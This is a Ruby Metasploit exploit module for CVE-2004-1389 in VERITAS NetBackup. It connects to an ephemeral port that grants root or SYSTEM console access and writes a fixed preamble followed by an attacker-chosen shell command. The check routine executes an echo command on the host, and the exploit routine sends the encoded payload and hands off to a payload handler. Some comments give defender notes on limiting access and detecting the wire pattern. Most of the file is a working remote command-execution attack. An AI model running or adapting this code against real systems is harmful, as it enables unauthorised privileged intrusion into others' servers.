Path: blob/master/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb
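##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit module for CVE-2004-1389 (VERITAS NetBackup).
#
# Per the module description, NetBackup opens an ephemeral port while an
# administrator is authenticated, and that port accepts console commands as
# root or SYSTEM from any source address. Both #check and #exploit write a
# fixed preamble followed by a newline-terminated command line to RHOST:RPORT.
#
# Defender notes (derived from the behaviour visible in this file):
# - The exposure is reachable "from any source address", so limiting which
#   hosts can reach NetBackup administration systems reduces it; the
#   vendor advisory for CVE-2004-1389 is the authority on fixed versions.
# - The preamble (three spaces, "1", six spaces, "1", newline) followed by a
#   shell command is what this module puts on the wire and can serve as a
#   starting point for a network detection rule.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata (references, platforms, payload limits).
  #
  # @param info [Hash] metadata overrides merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VERITAS NetBackup Remote Command Execution',
      'Description'    => %q{
          This module allows arbitrary command execution on an
        ephemeral port opened by Veritas NetBackup, whilst an
        administrator is authenticated. The port is opened and
        allows direct console access as root or SYSTEM from
        any source address.
      },
      'Author'         => [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2004-1389' ],
          [ 'OSVDB', '11026' ],
          [ 'BID', '11494' ]
        ],
      'Privileged'     => true,
      'Platform'       => %w{ linux unix win },
      'Arch'           => ARCH_CMD,
      'Payload'        =>
        {
          'Space'       => 1024,
          'BadChars'    => '',
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl telnet',
            }
        },
      'Targets'        =>
        [
          ['Automatic', { }],
        ],
      'DisclosureDate' => '2004-10-21',
      'DefaultTarget'  => 0))
  end

  # Active check: sends `echo <random marker>` to the service and looks for
  # the marker in the first response.
  #
  # NOTE: this is not a passive fingerprint; a command is executed on a
  # vulnerable host. Per the module description the port is only open while
  # an administrator is authenticated, so a Safe result reflects one point
  # in time and does not by itself show the host is patched.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is echoed back,
  #   Safe otherwise (including an empty or missing response)
  def check
    connect

    marker = rand_text_alphanumeric(10)
    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{marker}\n"

    sock.put(buf)
    banner = sock.get_once

    disconnect

    # get_once can return nil; to_s makes the comparison nil-safe.
    return Exploit::CheckCode::Vulnerable if banner.to_s.include?(marker)

    Exploit::CheckCode::Safe
  end

  # Sends the preamble and the encoded command payload, prints the first
  # response, then hands over to the payload handler.
  def exploit
    connect

    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"
    buf << payload.encoded
    buf << "\n"

    sock.put(buf)
    res = sock.get_once

    # res may be nil when the service sends nothing back.
    print_status(res.to_s)

    handler
    disconnect
  end
end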